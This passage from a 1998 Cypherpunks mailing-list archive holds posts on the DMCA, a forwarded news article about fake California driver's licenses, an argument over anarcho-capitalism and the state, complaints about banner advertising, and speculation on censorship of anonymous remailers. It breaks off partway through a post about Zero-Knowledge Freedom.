punish them by removing their account is over the line. Do I get restitution
for lost services from the copyright holder since I'm acting as their agent?

>        `(B) accommodates and does not interfere with standard
> technical measures.
> 
>           `(2) DEFINITION- As used in this subsection, the term
> `standard technical measures' means technical measures that are used
> by copyright owners to identify or protect copyrighted works and--
> 
>      `(A) have been developed pursuant to a broad consensus of
> copyright owners and service providers in an open, fair, voluntary,
> multi-industry standards process;

So this is voluntary?

>     `(B) are available to any person on reasonable and
> nondiscriminatory terms; and

Meaning they themselves aren't copyrighted?

>    `(C) do not impose substantial costs on service providers or
> substantial burdens on their systems or
> networks.   

Imposition of *any* cost is a substantial burden.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 8 Nov 1998 17:48:03 +0800
To: "Vladimir Z. Nuri" <cypherpunks@cyberpass.net
Subject: Re: IP: [FP] L.A. DMV Tries to Stem the Tide of Fake Licenses
In-Reply-To: <199811042123.NAA18961@netcom13.netcom.com>
Message-ID: <3.0.5.32.19981107232750.008f4e70@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:23 PM 11/4/98 -0800, Vladimir Z. Nuri forwarded
"ScanThisNews" <mcdonalds@airnet.net>'s forwarding to 
ignition-point by VIRGINIA ELLIS from last April - 
presumably the Digital Millenium Copyright Act means
that everybody here had better register or they're in Big Trouble :-)

Anyway, ....
The State has been forcing people to turn over private information,
such as SSNs and addresses, to an organization known to be riddled with
graft, information selling, and illegal issuing of licenses.
	"We have, in effect, created a cottage industry," 
	said Steve Solem, a DMV deputy director.
One of the big encouragements to this cottage industry has been
the anti-immigrant Pete Wilson administration's policy that
speaking Spanish causes bad driving so undocumented immigrants
can't be allowed to drive.  The article also points to other
groups of people denied permission to travel for non-safety-related reasons.



>SACRAMENTO - The California driver's license's preeminence as a form of
>identification has spawned a thriving black market for fraudulent licenses
>and a major corruption scandal in the state's motor vehicle department,
>records and interviews show.
>
>In recent years, as the lowly driver's license has been redesigned to make
>it more tamper-resistant, the card has increasingly become the dominant
>piece of identification for cashing checks, obtaining credit and securing
>government services.
....
>New laws have made a larger and larger pool of people susceptible to losing
>their license for activities unrelated to driving. The license can be
>suspended for spraying graffiti, failure to pay child support, truancy and
>certain kinds of prostitution. And immigrants who lack proper proof of
>residency cannot be issued one.
>
>"If you're a drunk driver, you want a fake ID," said Alison Koch, a senior
>special investigator for the DMV in Sacramento. "If you're in a gang, you
>want a fake ID. If you're a deadbeat dad, you want a fake ID. If you're an
>illegal alien, you want a fake ID. If you want to commit check or credit
>card fraud, you want a fake ID.
>
>"There is hardly a crime out there that doesn't demand some kind of
>fraudulent identification."
...
>Reed acknowledged the bad publicity was a wake-up call but disputed Peace's
>contention the DMV has a culture of corruption, saying the vast majority of
>the DMV's 8,600 workers are law-abiding.
...
>Birth certificates, which the DMV requires, are easily counterfeited, and
>phony ones are hard to spot, officials said. The appearance of birth
>certificates varies from state to state and sometimes, as in California,
>from county to county. Adding to the problem is California's open birth
>certificate procedure, which allows virtually anyone to get a certified copy
>of anyone else's birth record.
....
>Scattaglia said much of the counterfeiting may have its roots south of the
>border, but no one knows for sure because investigators have only been able
>to arrest the sellers, not the suppliers.
.....
>Banking officials are starting to rethink their heavy reliance on the
>driver's license. "That's certainly a trend that's underway because they are
>increasingly fake," said Gregory Wilhelm, lobbyist for the California
>Bankers Assn.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 8 Nov 1998 16:11:41 +0800
To: cypherpunks@cyberpass.net
Subject: Advertising Creepiness
In-Reply-To: <199811072128.NAA19724@netcom13.netcom.com>
Message-ID: <v03130303b26af796aaf9@[209.66.101.228]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:35 PM -0800 11/7/98, Declan McCullagh wrote:
>Seems to me that it would have been just as easy for "believer" to send the
>URL to the story as the whole thing. Same with ol'VZ.
>
>Not only is it in poor taste, but it means less people will read the
>article on wired.com, which is what pays the rent.
>

Myself, I try to mostly just snip out a few paragraphs of a story and
comment on them, fair use and all.

However, Declan's point about "what pays the rent" brings up an obvious
point: does _anybody_ look at those damned banner ads?

This is the new "blind spot"...that foveal region about a third of the way
down a Web page screen that has dancing icons, "click on me" junk, and
corporate logos. My guess is that nearly all of us skip this junk
completely, and I think marketing studies will someday confirm this. (There
have been tantalizing reports in places like the "Wall Street Journal" that
basically almost nobody sees these ads, but the full message hasn't sunk
in.)

And the advertising creeps are getting even creepier. Intel was running a
banner ad that looked like a typical Mac or Windows error/alert box,
something like "Click Here to Resume Operation." Creepy. And annoying.

And even my current favorite search engine, Metacrawler, now has banner ads
scattered throughout the search results. Tonight's ad (they change
frequently, of course) even looked like a *search script*! A field for
entering text and then an OK button...I didn't try it, but it was obviously
an attempt to mislead people--embedding a search script inside a search
result. (It was a "fake search script" to "Find people just like you," from
"PlanetAll.com")

And the common pages--Wired, Yahoo, Excite, Dejanews, .....--devote the
left third to junky promotions, the top fourth to their damned name
("Metacrawler" in 40-point type), and then scatter banned ads across a
third of what's remaining.

It's not uncommon for only 2-3 search results to come back on a screen of
1024 x 768.

Declan's own site, Wired.com, runs junk across the top, junk on the left
side, junk on the right side, and doesn't even use the screen real estate.
His story on Y2K, for example, is crammed into about a column inch or two
in the center.

This is what we've come to. Beautiful high resolution screens with junk
filling them.

(Yes, I tried the utilities which purport to flush banner ads, but they
didn't work well (long delays, cruftiness).)

Friends of mine routinely turn off all graphics, a point I'm about to reach.

So, Declan may think the banner ads at Wired.com pay the rent, and the bean
counters may think this is so, but I doubt any of us are looking at the
ads. Except the dummies.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Sun, 8 Nov 1998 13:27:06 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
In-Reply-To: <199811071710.LAA02112@einstein.ssz.com>
Message-ID: <364529A2.F4C8E9C9@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Sat, 07 Nov 1998 01:33:18 -0500
> > From: Michael Hohensee <mah248@nyu.edu>
> > Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
> 
> > No government can protect individual rights.
> 
> That isn't a reasonable statement. There is nothing in the definition or
> application of 'government' or 'individual rights' that preclude this. The
> issue becomes in a practical sense how the practitioners of a government
> system respect individual rights. If they are willing to do away with them
> to protect them (as we seem to be moving toward in this country) then of
> course there are no individual rights.

You missed my point.  What I'm trying to point out is that no government
(or any other body, for that matter) can prevent someone from doing
something.  All the state can do (and does, if you look closely) is
offer to punish anyone who disobeys it.  It doesn't matter whether that
state is protecting individual rights or not --it can only punish, not
prevent.

> Of course, this implies there are no collective rights either.

Correct.  There are none.  There are no collectives, only groups
comprised of individuals.  Therefore it would be meaningless to speak of
"collective" rights.

> >  The only way one could do
> > so would be if it: (a) could predict the future, and act to prevent
> > certain futures from happening; or (b) it controls every aspect and
> > motion of each individual's life, thereby ensuring that nobody steps out
> > of line.
> 
> What has that to do with protecting individual rights? Clarify please.

I'm explaining why it is impossible for the state to protect individual
rights. I offer two mechanisms by which the state *could* _protect_
individual rights, and then point out why they are impossible.  It is
something of a strawman argument, but if you disagree, I'm willing to
tear down any mechanism you might propose. :)

> > All any state can do is threaten to "retaliate" against (why not just
> > say "attack") people who disobey its edicts.  In order for this threat
> > to be credible, the state must wield sufficient power to kill any
> > individual (or group of individuals) who would stand against it.  If it
> > does not have this power, it cannot govern.
> 
> This is a quaint and completely artificial distinction.

Is it really?  Then could you please explain to me exactly why I would
have to pay taxes (or otherwise make submission) to a state which did
*not* have the power to kill me?  If it lacks this power --and I mean
this in a physical sense, not a legal one-- then what is to stop me or
anyone else from telling it to fuck off?  Such a state cannot govern
those who do not wish to be governed, and so would not be a government.

> > The problem is, if it does
> > have this power, then there is nothing to stop those individuals in
> > control of the state from violating the individual rights of its
> > citizens.  As often seems the case today, for example.
> 
> We also see quite a few situations where the opposite occurs as well.

Occasionally, yes.  The state does not yet have absolute power, or does
not yet choose to wield it fully in all situations.  But we've already
got an impressive list in the USA alone.  We've had Ruby Ridge, we've
had Waco, the countless raids on the homes of innocent people in the
name of the drug war (and the countless raids on the homes of innocent
drug-addicts, for that matter).

> > The system you suggest, which I assume consists of a state with a
> > "minimal" amount of power, run by enlightened people, is in a state of
> 
> Anyone who assumes noble oblige is an idiot. There are no enlightened
> people, intelligence and wealth no more prepare an individual for a
> position in government than they prepare them for anything else.
> Rich/intelligent people don't make less mistakes than those who aren't.

Correct, which is the main reason that we cannot trust a state in any
shape or form, regardless of how good the people running it may seem.

> > extremely unstable equilibrium (if it is indeed in equilibrium).  If it
> 
> If you're talking of Hayek's equilibrium, it's nothing more than a
> bastardization of a thermodynamics term to represent the status quo.
> Equilabrium in the economic sense simply means that people do today what
> they did yesterday. In general they do about as often as they don't.

Actually, I wasn't thinking of Hayek at all.  ;) 

I was just pointing out that a "benign" state, even if it were possible
to create one (which, as you pointed out in your last paragraph, is
impossible), would not stay benign very long.  Economics is not
discussed in this portion of the argument.

> > wields just enough power to enforce its will, that power can be used by
> > evil men to increase its power.
> 
> Evil? Where did religion come into this at?

Forgive me, I was trying to shorten the sentence a bit, and assumed that
"evil men" would be understood to refer to those men (and women) who
wish to rule other people, for whatever reason.  Your personal
definition of evil may vary.  

Can we agree that it is wrong to rule others?  This is the fundamental
distinction which sets us apart from the statists.

> > Just look at what happened after the Constitutional coup took place in
> > the fledgling USA.  Remember the Whiskey Rebellion?  When we lost the
> > Articles of Confederation, we were taking the first steps down the road
> > to the tyranny of today.  The anti-federalists predicted this, although
> > they sorely underestimated how far it would go --assuming that it would
> > be stopped by another revolution.
> 
> There have been several since then. The Civil War and the civil rights
> movement in the 60's are two good examples (on the opposite end of the
> 'use-of-violence' scales).

The war of northern aggression is more of a reverse revolution, from
this standpoint.  The south peacefully left the union, and the north
reconquered it. It's roughly analogous to what would have happened had
the british won the american revolution.

As for the civil rights movement; it just goes to show that not
*everything* that happened after 1776 was a bad thing.  

> > The minimalist state has been tried.
> 
> No, that was a non-federalist state where the individual states acted as
> individuals in a collective. Because of the collective nature of the state
> governments it didn't work. A minimalist state would be anarchy.

Not by the definition of a state given above.  The minimalist state must
wield sufficient power to rule those who would disobey its edicts,
otherwise it's not a state --just a bunch of losers who dress pompously
and issue meaningless proclaimations.  Anarchy is the *absence* of the
state.  

> > The only truly free system is one in which there is no body of people
> > calling itself a government which can enforce its will over the
> > individual.  The only way people can seem to be free living under such a
> > body is entirely dependent upon the good will of their masters, and this
> > is a shaky assumption to make.
> 
> No it isn't the only way. The only way is to clearly define the duties of
> each level of government and build a system of checks and balances that
> prohibit them from moving outside their domains. A good first attempt at
> this was the Constitution and the Bill of Rights (in particular 9 & 10).
> The problem is that there are individuals who don't want to be limited in
> their authority. It's a person problem not a government problem.

You are proposing a means of setting up a benign government.  For it to
be a government, it must wield sufficient power to rule.  For it to be
benign, it must be run by "good" men (i.e. those who will not use the
state to increase their personal power).  But as you pointed out, it is
foolish to trust that the state will be run by such individuals,
regardless of who they are.  Thus it would seem that it is impossible to
create a benign state.  Thus we should avoid having one.

> > How about:  Any action that involves the initiation of force against the
> > property of another person (the person belongs to himself, of course) is
> > immoral.
> 
> Morality? Why do you keep bringing religion and individual beliefs into it?

I used the word because the person I responded to used it.  Exactly what
is considered "immoral" does of course vary from person to person. 
Perhaps a better word would be "wrong", "antisocial", "socially
unacceptable", or perhaps "not to be tolerated".

> A person is, they don't belong to anyone.

No, a person belongs to him or herself.  *Someone* is directing my
actions, and guess what: it's me.  I choose what I will and will not
do.  I choose what I say.  I choose what I think.  I belong to me.

> It should be:
> 
> Any act that harms a person or their property without their prior permission
> is a crime. 

Correct.  It is wrong to initiate force against another person or their
property.  It is of course no problem if the person owning the property
gives you permission to harm it.  Then it's not initiation of force.

> There are no exceptions other than immediate personal self
> defence, which terminates upon the application of minimal force to guarantee
> the threat will not reoccur (in many cases this means kill the attacker).
> This should apply to all individuals participating in a governmental role as
> well.

I agree.  This more detailed explaination of how much force should be
applied in response to an attack.  It should be small enough to ensure
that you don't accidentially end up looking like you're in the wrong
afterwards, and large enough to ensure that there *is* an afterwards. ;)

> > This neatly tidies up the obvious question of exactly what "individual
> > rights" are.  There's a partial list of them in the bill of rights, but
> > it is not complete, by its own admission.
> 
> By it's own admission they are protected from denial by the 9th and 10th so
> they don't need to be listed (unlike the 10th lists the duties of the
> government system). The problem is conservatives and liberals alike don't
> respect those boundaries. They want more.

Correct.  No state can be benign if it is run by corrupt individuals. 
This is another example which supports the idea that the state is a bad
idea.

> >  Furthermore, the above
> > definition excludes such dubious rights as the "right to an education",
> > the "right to welfare", etc.
> 
> Now you're doing exactly what you are complaining about. Your defining others
> rights when you don't want them defining yours.

No, I'm describing what are obviously *not* rights.  If someone has a
"right" to an education, then that means that he has a right to get it
whether or not he can pay for it.  That is, if he can't pay for it, he
has the right to take money which belongs to other people (i.e. steal
the property of others).  (either that or he has the right to a "free"
education, which translates to him having a right to make someone teach
him without compensation, which is also theft).

The same argument applies to welfare.  If you do not agree, then what
you said about it being wrong to harm another person or that person's
property without their consent is sheer hypocrisy.

> People may very well have a right to welfare and an education (I believe
> people have a civil right to medical and legal advice gratis - stems from
> the pursuit of life, liberty, and happiness). The issue isn't that. The
> issue is *what are the duties of the government as defined in its charter*.
> If those duties are not in there (and they're not) then it shouldn't be
> doing it without an amendment from the charter.

So, you're saying that you're a statist? :/

> > All of the above involve the initiation (or threat of initiation) of
> > force.  Hence they are immoral, and the victims and any bystanders would
> > be morally justified in using force against the initiators.  Of course,
> > this would not be true in a governed society, where the state must hold
> > a monopoly on the use of force, if only to maintain its own position.
> > Much less efficient.
> 
> Go read the Constitution, it's true here in our governemnt though many
> people don't want it to be so. As a result they find all kinds of childish
> and inane reasons to deny the obvious.
> 
> Like it or not the federal governments panapoly of current powers are as
> vacous as the king is naked.
> 
> It's like executive orders, unless you happen to work for the executive
> branch they aren't worth the paper they're written on. Why? Because at no
> point is the office of President given this authority over anyone other than
> executive branch employees. He has no more authority to dictate general
> behaviour via that mechanism than you or I do - zero. Per the 10th there is
> not one sentence in the Constitution that delegates that authority to the
> office.

In a strictly legal sense, you are correct.  In reality, however, things
are slightly different, since there is a large supply of men with guns
who are apparently willing to execute these legally unjustified orders
--and me, if I get in their way.

When I talk about power, I'm not talking about namby-pamby _legal_
power.  I'm talking about raw *physical* power.  From a practical point
of view, what's written on a piece of paper is irrelevant if I'm
confronted with armed men who are willing to ignore it.

> > We've all got our pet peeves.  Would you like to live under mine?  Would
> > I like to live under yours?  Can I trust you to be tolerant?  Can I
> > trust your successors, 20 years from now?  Can my descendants trust
> > subsequent successors, 200 years later?  Experience tends to show the
> > contrary.
> 
> There is more at stake than toleration or trust. You paint with too narrow a
> brush. If you're saying we should have anarchy then you're as kooky as the
> people who don't literaly interpret the Constitution.

Why?  Is it insane not to trust in the state?  *You yourself* have
pointed out why we cannot trust those organizations called states.  If
I'm insane, you appear to be schizophrenic. ;)

> > The anarcho-capitalist free market is not one where "everything goes,"
> > and there is indeed a strong concept of individual rights.  What is
> > moral and not moral is defined by society on an individual basis.  The
> > first and only rule is:
> 
> First, it is one of everything-goes because there is no mechanism that will
> stop anybody from doing anything. There are NO concepts of *rights* in such
> a system, let alone individual rights. If anything the only rights are who
> has the capitalist backing to stave off the anarchic forces. That's not
> justice, equality, or respect for rights.

You are forgetting *social* mechanisms.  You are assuming that everyone
won't care if one of their friends is hurt.  You are assuming that
people will never take action against those who they percieve to be
threatening or harming them or their friends.  These assumptions are
*invalid*.

> > No one has the right to initiate force against another or another's
> > property.
> 
> Attack me with your body and property and watch it happen junior.

You misunderstand what is meant by the "initiation of force".  If I were
to attack you, it would be I who would be initiating force, not you. 
The force you use in response to my initiation of force would not have
initiated the conflict, thus you are not initiating force.

> > This is the fundamental and only "social contract" we make.  Anyone who
> > disagrees with this is obviously antisocial, and nobody's going to want
> > to live with him (or allow him to continue living, if he attacks
> > someone).
> 
> Oh bullshit. There is much more involved like not stealing which isn't the
> use of force and allowed by your anarcho-capatilism as well as your
> definition of valid use of force above.
>
> It's gibberish.

Nope.  Theft is an initation of force against my property.  If I happen
to be there, it would usually involve the initiation of force against
me, as I would probably desire to keep my property.

> > >From this, morality follows.  If X does Y to Z, and if Y is perceived as
> > immoral, then X is not going to be very popular with Z or anyone else,
> > unless he can make amends.  No one will want to trade with him, be near
> > him, etc.  This is a very strong motive to avoid doing immoral things.
> 
> Will you get religion the hell out of here please. 

Again, I apologize for using the word "morality", since it obviously
triggers your religion button.

> Y is obviously popular
> with X or else they wouldn't have used it. It further follows that there are
> more than one X-type out there. So your premise falls down on its face in
> the dirt.

Afraid not.  Just because there's more than one X out there doesn't mean
that Y is still a good thing to do.  If there is a sufficient number of
Z's who are willing to ostracize any X who does Y, then X is given a
strong motivation to not do Y, lest X end up starving and alone.

If, however, very few people consider Y immoral, then X will have no
problems.  Any Z's who treat X badly for Y will tend to be shunned by X
and his friends, putting pressure on the Z's to mind their own business.

This an example of a negative feedback loop --in stark contrast to the
positive feedback associated with the level of corruption in a state.

> > If Y is really nasty, such as the initiation of force, then X is going
> > to be in *deep* trouble.
> 
> With who? In an anarcho-capitalist society as you paint it the optimal strategy
> is to allow others to reduce your competition opening up the market for you.

No, I never painted it that way.  This is what *you* associate with
anarcho-capitalism.  

> Let's take an example. Imagine we live on a street and we notice a person
> going from house to house down the other side of the street. What is our
> optimal strategy? It isn't to call the cops (there aren't any) and it isn't
> to immediately kill the intruder (it isn't our property after all) since
> there is an opportunity to make a considerable gain here improving our
> status in the society as a whole. The optimal strategy is to wait and let
> this bozo kill our neighbors up to our house and *then* kill the intruder.
> At that point we have just inhereted an entire street of houses and its
> included properties. You put up a fence across each end of the street and
> wallah, your own little fifedom. If you're really lucky something similar
> will happen on the next street over and they won't be as lucky at killing
> the intruder. Then after they are all dead and the intruder has consolidated
> their gains (probably by fencing their street in) you can begin to scheme
> ways of taking that property since its obvious yours is next.

This is not the optimal strategy.  The optimal strategy is to warn your
neighbors, or call the neighborhood security service.  You do this
because you want them to do the same for you, should you come under
attack.  This is why most primates (specifically humans) live in groups
--it's easier to see the predators coming with everyone watching, and
it's easier to fend them off if everybody picks up a stick.

Fortunately, most people are already programmed to behave in a social
fashion (the ones who weren't got eaten 40,000 years ago).  The scenario
you paint above relies on the assumption of a sudden change in human
nature, if the all protecting state were to evaporate.  This is an
incorrect assumption.  Many have been the times that people have thought
they could change human nature, and equally many are the failures.

> >  Z may well shoot him out of self defense, and
> > even if he survives his action, he'll have to pay a *lot* of restitution
> > before people will trust him again, if ever.  Law enforcement by
> > ostracism --read L. Neil Smith's "The Probability Broach", for a more
> > detailed description.
> 
> Wait a second, there is no law to enforce here outside of make money, obtain
> property, keep somebody else from taking it.

You are overlooking common law.

> > In summary, a free market is far from being an immoral market.  In fact,
> > it is the most moral market there is, since there is no state which
> > holds the "right" to initiate force.
> 
> In summary a free-market is a anarchy of kill or be killed, take or get
> taken. He with the most goodies wins until somebody with a better strategy
> comes along. There is nothing to moderate the use of force, especialy when
> its the optimal strategy to increase ones holdings.
> 

Except, as I've pointed out, it is *not* the optimal strategy.  Perhaps
you would enjoy the works of Richard Dawkins.  He goes into great detail
describing exactly how nonviolent strategies are superior to violent
ones.  I'll just give one example here.

When two bears approach the same berry bush, they do not immediately
start fighting over it.  Instead, they each stick to one side of the
bush, and do not disturb one another.  Why, if your strategy is the
optimal one, would this be the case?  After all, bears are already
pretty good at attacking things.  It would be pretty easy for a
exceptional bear to break this rule, and become dominant over the other
bears, if what you say is true.

But it is obvious that bears *don't* do this.  That any bears or
ancestors of bears that ever did do this were somehow out-competed by
their peaceful counterparts.  Thus it would appear, from available
evidence, that your approach *is not* superior to the peaceful
approach.  Read Dawkins' "The Selfish Gene" for a more in-depth
argument.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 8 Nov 1998 16:39:08 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Advertising Creepiness
In-Reply-To: <v03130303b26af796aaf9@[209.66.101.228]>
Message-ID: <199811080818.AAA05625@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I like the wired.com site and hit it almost daily. I consider
it one of the highest quality sites on the net, and their
system of linking to other daily articles on other sites
I really like. (wish they would summarize their articles
better though before you click through-- something that
they have resisted for a long time but for what reason
I have no idea)
I do look at banner ads but rarely click on them.

regrding copyright issues on the web, there is an
interesting article in an old CUD called "the cyberspatial
copyright" that captures my own thinking on the subject,
for anyone with the lack of laziness to seek it out <g>

it would have been nice if Declan identified his affiliation
with Wired in his complaint.. 

a nice post TCM, you have written on the idea of
the worthlessness of banner ads long ago. but you've
been way wrong too (er, ah, more diplmatically, "off")
based on your old posts. I recall a post, I think, in which
you predicted that ads would eventually be thrown 
away on the net after proven worthless.  your current
msg contains a similar theme.

clearly
the absolute opposite has happened. ads are successfully
funding the net and entire new cool and innovative
startups such as "doubleclick" etc. that are in many
ways "virtual businesses" that run on information flow.
3rd wave, alvin toffler, is definitely HERE.

TCM, you appear never to have worked in advertising.
advertisers do not put out ads so that every person
who reads it buys the product or clicks on the ad.
they are satisfied with 1/100 "click thrus", and that's
exactly what they get. online advertising is very,very
cost effective if done properly. it can really be
"microtargeted" in a way existing advertising isn't.

so TCM, you are confusing two issues. advertising in
general is annoying, ubiquitous, in-your-face in our
culture. some estimates are that 1000+ ads are seen daily
by each individual when you look at tv, magazine, outdoor,
etc.   online advertising shares all these traits. 

however, online advertising does not have to be a miracle cure.
it only has to be as good (but idealy better) 
than *existing* advertising systems
in use. and they are very inefficient and wasteful at times
if you are aware of that industry. online advertising is
downright streamlined compared to other forms that have
preceded it.

consider the breakthrough of geocities in which entire free
*personal* (not corporate!!)
web sites are supported by advertising solely!! geocities is
a small cyberspace miracle unappreciated by many. they are growing
insanely and their quality is getting to be really top notch.

personally
I think online advertsiing is really cool because it is funding
the civilization of cyberspace. it's annoying and tacky and
in-your-face, but it pays the bills, and is doing more so
every day. it will get less obnoxious over time in some ways
as you begin to run into only the ads that interest you based
on "microtargeting" so to speak. 

you buy stuff, right TCM?
well online ads may get to the point where you stop complaining
and find them a very valuable resource to make your buying
decisions--even objectively (for example an ad could link
to an objective 3rd part like "consumer reports"). 
I think this day is not too far off. in many ways it is already
here.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sun, 8 Nov 1998 14:01:25 +0800
To: "Vladimir Z. Nuri" <cypherpunks@cyberpass.net
Subject: Re: IP: Crunch Time for Y2K Suppliers
In-Reply-To: <199811072128.NAA19724@netcom13.netcom.com>
Message-ID: <199811080538.VAA24008@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Seems to me that it would have been just as easy for "believer" to send the
URL to the story as the whole thing. Same with ol'VZ.

Not only is it in poor taste, but it means less people will read the
article on wired.com, which is what pays the rent.

-Declan


At 01:28 PM 11-7-98 -0800, Vladimir Z. Nuri wrote:
>
>From: believer@telepath.com
>Subject: IP: Crunch Time for Y2K Suppliers
>Date: Thu, 05 Nov 1998 11:22:46 -0600
>To: believer@telepath.com
>
>Source:  Wired
>http://www.wired.com/news/news/politics/story/16035.html?3
>
>Crunch Time for Y2K Suppliers
> by Declan McCullagh 
>
> 4:00 a.m.5.Nov.98.PST
> The phones are already ringing when Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sun, 8 Nov 1998 12:57:02 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Grounding (fwd)
Message-ID: <19981108044003.6326.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



It seems so pointless to correct Choate.  The guy is almost totally
impervious to enlightenment.  But a couple of whoppers have to be
pointed out...

> Secondly, you're considering an electron carrying a photon as a
> single wavicle, it ain't. It's a superposition of several wavicles (3 quarks
> and a lepton to be exact under the standard model).

Electrons don't "carry" photons.  An atom can absorb a photon, raising
an electron to a higher energy level, but the photon is then gone.  And
a single moving electron certainly doesn't carry a photon.  Photons move
at the speed of light, always.

Quarks are constituents only of baryons.  There are no quarks in electrons
or photons.

Choate's bizarre description of a "spark gap" inside a conductive
globe culminates with this:

> Unlike charges attract. Therefore the gas of electrons are attracted to the
> inside surface. Now since the globe is neutral it must follow by
> conservation of charge that there is a negative charge equal to the charge
> held in the gas on the *OUTSIDE* of the ball.

The net charge within the sphere will not change.  If the box in the
middle with the "spark gap" is spraying out electrons, this can only mean
that the box is itself becoming positively charged.  The sphere sees a
constant charge within itself; at best, the charge can be redistributed.
There are no net changes of charge within the sphere and so there will
be no changes in any charge appearing on the outside of the sphere.

Choate's whole model of how a spark gap transmitter works, and why it
emits electromagnetic radiation, is so bizarre that it is hard to believe.
Someone else can bang their head against the brick wall of his ignorance
on that topic.

Choate is, by far, the worst poster on the cypherpunks list today.  He
posts off-topic material, he is argumentative, and 90% of the time, he
is simply wrong.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>bman@ahh.ohh
Date: Sun, 8 Nov 1998 15:32:32 +0800
To: cypherpunks@Algebra.COM
Subject: Re: A question about the new ISP ruling and email...
In-Reply-To: <199811071757.LAA02280@einstein.ssz.com>
Message-ID: <199811080706.IAA28043@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>A more interesting question is whether anonymous remailers will need to
>register.  I suspect that there will be a challenge to this law that will

I think they will. The brief period of loose controls over communication
media is coming to an end. State correctly identified the problem and
now it is effectively being dealt with.

As printed mass media enjoyed short period of "freedom" at the beginning
of the century, so did internet in last five-six years or so.

All identifiable concentration nodes (news, ftp & http servers,
remailers, dial-in access points etc.) will eventually be censored. It
is interesting to note that today's network topology is more vulnerable
to censorship than UUCP was.

The only (partial) solution is to raise the cost of censoring by
requiring one-to-one effort. In other words, serverless world in which
end users directly exchange (preferably encrypted) packets over common
carriers. Hint: *Bsd + IPSec + uucp over IP and then merge in Crowds
technology where real-time relaying is needed.

Actually ... cypherpunks is a good choice for the first port.

The Barnman




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Sun, 8 Nov 1998 22:10:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Advertising Creepiness
In-Reply-To: <199811072128.NAA19724@netcom13.netcom.com>
Message-ID: <19981108134525.A26515@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, Nov 07, 1998 at 11:50:05PM -0800, Tim May wrote:
 
> Myself, I try to mostly just snip out a few paragraphs of a story and
> comment on them, fair use and all.

I particularly dislike articles that are things forwarded from other
lists without comment (IP seems a particular offender here).  These are
rarely interesting.

> This is the new "blind spot"...that foveal region about a third of the way
> down a Web page screen that has dancing icons, "click on me" junk, and
> corporate logos. My guess is that nearly all of us skip this junk
> completely, and I think marketing studies will someday confirm this. (There
> have been tantalizing reports in places like the "Wall Street Journal" that
> basically almost nobody sees these ads, but the full message hasn't sunk
> in.)

Click through rates are something like 2%, so most are screening them out.
I rarely noticed what the ads actually said.

> (Yes, I tried the utilities which purport to flush banner ads, but they
> didn't work well (long delays, cruftiness).)

I don't know which ones you have tried but junkbuster 

http://www.junkbuster.org/ (a proxy on port 8000)

works _very_ well on my linux system, particularly with the "blank gif"
patch.

It blanks out 99% of banner gifs, which makes pages like metacrawler and
wired look more visually attractive and load faster.

Until I lost all the banner ads I hadn't realised how distracting all those
animated gifs at the top of the screen were and its now much faster and
easier to read the info you want, without them.

> Friends of mine routinely turn off all graphics, a point I'm about to reach.

I tried this but found it made the net too hard to use.

> So, Declan may think the banner ads at Wired.com pay the rent, and the bean
> counters may think this is so, but I doubt any of us are looking at the
> ads. Except the dummies.

It would give a brave browser manufactor (Opera?) quite an advantage if
they built the banner ad killer into the browser directly.

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

    i'm a programmer: i don't buy software, i write it.
    --tom christiansen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 8 Nov 1998 21:58:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Response to Anonymous re: Zero-Knowledge Freedom
Message-ID: <199811081325.OAA13192@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous,

[..]
: >FREEDOM servers in their home country (example: if terrible laws are
: >passed like in the Netherlands requiring logging and storage of all
: >packet info., etc.). In this manner, a local user in a restrictive

I'm not aware of any law that requires "logging and storage of all
